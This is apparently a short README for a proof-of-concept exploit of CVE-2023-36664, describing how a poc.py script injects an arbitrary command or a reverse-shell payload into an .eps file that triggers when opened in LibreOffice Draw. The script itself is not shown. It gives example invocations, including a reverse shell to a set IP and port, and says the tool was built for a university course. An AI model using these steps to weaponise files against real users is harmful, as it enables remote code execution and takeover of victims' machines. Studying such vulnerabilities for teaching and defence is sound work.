Proof of concept for the CVE-2023-36664.
To insert a payload into a .eps file :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefoxTo insert a reverse shell payload into a .eps file :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234The opening of the injected file in Libreoffice Draw should trigger the payload.
This proof of concept was developed for a specific course at university. It is published here only for pedagogical usage.